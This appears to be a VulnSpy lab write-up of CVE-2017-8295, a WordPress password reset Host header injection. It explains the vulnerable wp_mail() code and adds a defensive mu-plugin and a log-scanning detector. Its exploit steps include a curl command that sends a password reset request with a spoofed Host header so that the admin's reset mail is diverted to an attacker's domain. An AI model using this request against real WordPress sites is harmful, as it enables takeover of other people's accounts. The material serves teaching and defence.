CVE-2017-8295: WordPress 2.3-4.8.3 Unauthorized Password Reset/Host Header Injection Vulnerability Exploit


WordPress is the most widely used content management system today. According to W3Techs statistics, around 30% of the world's web sites are based on WordPress.

The password reset function in WordPress 2.3 through 4.8.3 uses the client-supplied HTTP_HOST value directly when building the headers of the password reset mail. An attacker can exploit this to obtain the contents of the password reset mail.

In this article, we use VulnSpy's online WordPress environment to demonstrate the exploitation of this vulnerability.


ANALYSIS

In WordPress, the wp_mail() function is used to send mail. If no From address is set when sending, 'wordpress@' . $_SERVER['SERVER_NAME'] is used as the From address of the mail. On most web servers, the SERVER_NAME variable is derived from the Host header of the client request, which means that the From address is user-controlled.

The function wp_mail() is declared in the file WordPress/wp-includes/pluggable.php:

function wp_mail( $to, $subject, $message, $headers = '', $attachments = array() ) {
...//ignore
    if ( !isset( $from_email ) ) {
        // Get the site domain and get rid of www.
        // SERVER_NAME is, on most servers, taken from the client's Host header,
        // so this value is attacker-controlled.
        $sitename = strtolower( $_SERVER['SERVER_NAME'] );
        if ( substr( $sitename, 0, 4 ) == 'www.' ) {
            $sitename = substr( $sitename, 4 );
        }
        $from_email = 'wordpress@' . $sitename;
    }
    /**
     * Filters the email address to send from.
     *
     * @since 2.2.0
     *
     * @param string $from_email Email address to send from.
     */
    $from_email = apply_filters( 'wp_mail_from', $from_email );
    /**
     * Filters the name to associate with the "from" email address.
     *
     * @since 2.3.0
     *
     * @param string $from_name Name associated with the "from" email address.
     */
    $from_name = apply_filters( 'wp_mail_from_name', $from_name );
    $phpmailer->setFrom( $from_email, $from_name );
...//ignore
}

In some cases, the mail server uses the From address directly as the Return-Path. When delivery fails, the bounce (which carries the original message) is forwarded to the Return-Path address automatically. Because the From address is user-controlled, a WordPress password reset mail can therefore end up at a mail server chosen by the attacker.
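A server-side mitigation for the behaviour described above, written here as an added example (it is not code from WordPress or from VulnSpy): a must-use plugin that hooks the wp_mail_from filter shown in the core excerpt and replaces the SERVER_NAME-derived default with an address on an allowlisted domain. The host list, the fallback domain and the function names are assumptions made for this illustration.

```php
<?php
// Added example (not WordPress core code): a drop-in mu-plugin that pins the
// From address of outgoing mail to a trusted domain instead of trusting
// $_SERVER['SERVER_NAME']. The host list below is a constructed sample.
const TRUSTED_MAIL_HOSTS = array( 'example.com', 'www.example.com' );
const FALLBACK_MAIL_HOST = 'example.com';

/**
 * Build the From address without echoing back an untrusted host name.
 *
 * @param string $server_name Value of $_SERVER['SERVER_NAME'] (or any host string).
 * @param array  $trusted     Host names the site legitimately serves.
 * @param string $fallback    Host used when $server_name is not trusted.
 * @return string             "wordpress@<host>" where <host> is always trusted.
 */
function pinned_from_address( $server_name, array $trusted = TRUSTED_MAIL_HOSTS, $fallback = FALLBACK_MAIL_HOST ) {
    $host = strtolower( trim( (string) $server_name ) );
    // Drop an explicit port ("example.com:8080") before comparing.
    $host = preg_replace( '/:\d+$/', '', $host );
    if ( ! in_array( $host, $trusted, true ) ) {
        // Unknown host: never use it. Log it (an unexpected Host value on a
        // mail-sending request is exactly the signal worth alerting on) and
        // fall back to the configured name. Non-printable bytes are masked so
        // the log line itself cannot be polluted.
        $safe = preg_replace( '/[^\x20-\x7e]/', '?', (string) $server_name );
        error_log( 'wp_mail_from: rejected untrusted host "' . $safe . '"' );
        $host = $fallback;
    }
    // Same "www." stripping that WordPress core performs.
    if ( substr( $host, 0, 4 ) === 'www.' ) {
        $host = substr( $host, 4 );
    }
    return 'wordpress@' . $host;
}

/**
 * Stand-alone self-check; returns true when every case behaves as intended.
 */
function pinned_from_address_self_test() {
    return pinned_from_address( 'www.example.com' ) === 'wordpress@example.com'
        && pinned_from_address( 'EXAMPLE.COM:8443' ) === 'wordpress@example.com'
        // An attacker-supplied Host value never reaches the From address.
        && pinned_from_address( 'untrusted.invalid' ) === 'wordpress@example.com'
        && pinned_from_address( '' ) === 'wordpress@example.com';
}

if ( function_exists( 'add_filter' ) ) {
    // Inside WordPress: override core's SERVER_NAME-derived default. The filter
    // receives core's value but ignores it and recomputes from the allowlist.
    add_filter( 'wp_mail_from', function ( $from_email ) {
        $name = isset( $_SERVER['SERVER_NAME'] ) ? $_SERVER['SERVER_NAME'] : '';
        return pinned_from_address( $name );
    } );
} elseif ( PHP_SAPI === 'cli' ) {
    // Run from the command line (php pin-mail-from.php) to exercise the logic.
    echo pinned_from_address_self_test() ? "all checks passed\n" : "FAILED\n";
}
```

Placed in wp-content/mu-plugins/ this runs on every request without activation. The same goal can also be reached one layer lower: on Apache, UseCanonicalName On together with an explicit ServerName makes SERVER_NAME come from the configuration rather than from the request, and on nginx a catch-all default server that rejects unknown Host values keeps requests with foreign host names away from the site entirely. Doing both is the defensible setup, since the application then no longer depends on the web server being configured correctly.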


EXPLOIT

1. Click the START TO HACK button at the top right of the page and let VSPlate create the online environment automatically.

2. Install WordPress

Note: The administrator e-mail address is set here to a nonexistent address, demo@vulnspy.ooo. This simulates a DNS/DoS attack that makes delivery of the password reset mail to the administrator fail.

3. Log into the VSPlate online terminal.

4. Create an e-mail account such as wordpress@yourdomain.com.

Note: yourdomain.com is your own domain name. A free business e-mail service can be used to create the address. We use wordpress@vulnspy.com in the demonstration.

5. Send a password reset request from the online terminal with a modified Host header.

We use the online terminal to simulate an attack on a WordPress site on the intranet.

Run the following command in the online terminal:

curl -v 'http://127.0.0.1/wp-login.php?action=lostpassword' -H 'Host: vulnspy.com' --data 'user_login=admin&redirect_to=&wp-submit=Get+New+Password'

If delivery of the mail fails, the message is forwarded to wordpress@vulnspy.com automatically. That is, the mail intended for the administrator demo@vulnspy.ooo ends up at wordpress@vulnspy.com.

6. Receive the mail at wordpress@vulnspy.com.

If the attack succeeded, wordpress@vulnspy.com receives the password reset mail.

7. Reset the password.
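The request in step 5 leaves a clear trace for defenders: a password reset POST whose Host header is not one of the site's own names. The following is an added example (not part of the original page and not WordPress code) that scans web server access logs for exactly that pattern. It assumes an Apache LogFormat that records the Host request header as the first field, and the log lines, host names and function names are constructed for this illustration.

```php
<?php
// Added example (not from the original page or WordPress): flag password reset
// requests whose Host header is not one of the site's own names. Assumes an
// Apache LogFormat that records the Host request header first, for example:
//   LogFormat "%{Host}i %h %l %u %t \"%r\" %>s %b" hostlog
const SITE_HOSTS = array( 'blog.example.com', 'www.example.com' );

/**
 * Constructed sample log in the format above (not real traffic).
 */
function sample_hostlog() {
    return implode( "\n", array(
        'blog.example.com 203.0.113.5 - - [10/Mar/2018:10:01:02 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 302 0',
        'untrusted.invalid 198.51.100.7 - - [10/Mar/2018:10:02:15 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 302 0',
        'blog.example.com 203.0.113.9 - - [10/Mar/2018:10:03:40 +0000] "GET /wp-login.php HTTP/1.1" 200 2481',
        'untrusted.invalid 198.51.100.7 - - [10/Mar/2018:10:04:01 +0000] "GET /?p=1 HTTP/1.1" 200 5120',
    ) );
}

/**
 * Parse one log line into its fields, or return null if it does not match.
 */
function parse_hostlog_line( $line ) {
    $re = '/^(\S+) (\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)$/';
    if ( ! preg_match( $re, $line, $m ) ) {
        return null;
    }
    return array(
        'host'   => strtolower( $m[1] ),
        'client' => $m[2],
        'time'   => $m[3],
        'method' => $m[4],
        'path'   => $m[5],
        'status' => (int) $m[6],
    );
}

/**
 * Return the entries that are password reset requests (POST to wp-login.php
 * with action=lostpassword) carrying a Host value outside $site_hosts.
 */
function find_host_spoofed_resets( $log, array $site_hosts = SITE_HOSTS ) {
    $hits = array();
    foreach ( preg_split( '/\R/', trim( $log ) ) as $line ) {
        $e = parse_hostlog_line( $line );
        if ( $e === null ) {
            continue; // unparsable line: skip rather than guess
        }
        $query = parse_url( $e['path'], PHP_URL_QUERY );
        parse_str( (string) $query, $params );
        $is_reset = $e['method'] === 'POST'
            && strpos( $e['path'], '/wp-login.php' ) === 0
            && isset( $params['action'] ) && $params['action'] === 'lostpassword';
        // Compare without an explicit port so "blog.example.com:443" still matches.
        $host = preg_replace( '/:\d+$/', '', $e['host'] );
        if ( $is_reset && ! in_array( $host, $site_hosts, true ) ) {
            $hits[] = $e;
        }
    }
    return $hits;
}

if ( PHP_SAPI === 'cli' ) {
    // Usage: php find-spoofed-resets.php < access.log  (falls back to the sample)
    $log = stream_isatty( STDIN ) ? sample_hostlog() : stream_get_contents( STDIN );
    foreach ( find_host_spoofed_resets( $log ) as $hit ) {
        printf( "%s  %s  Host=%s  %s %s\n",
            $hit['time'], $hit['client'], $hit['host'], $hit['method'], $hit['path'] );
    }
}
```

Only the reset request with the foreign Host value is reported; the ordinary reset from a legitimate host and the unrelated GET requests are ignored. On a fleet, the same check is simpler to express in the SIEM as "path contains wp-login.php, query contains action=lostpassword, Host not in the site's allowlist", and the mu-plugin's error_log line from the analysis section gives a second, application-side signal for the same event.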

All rights reserved. © 2018 VULNSPY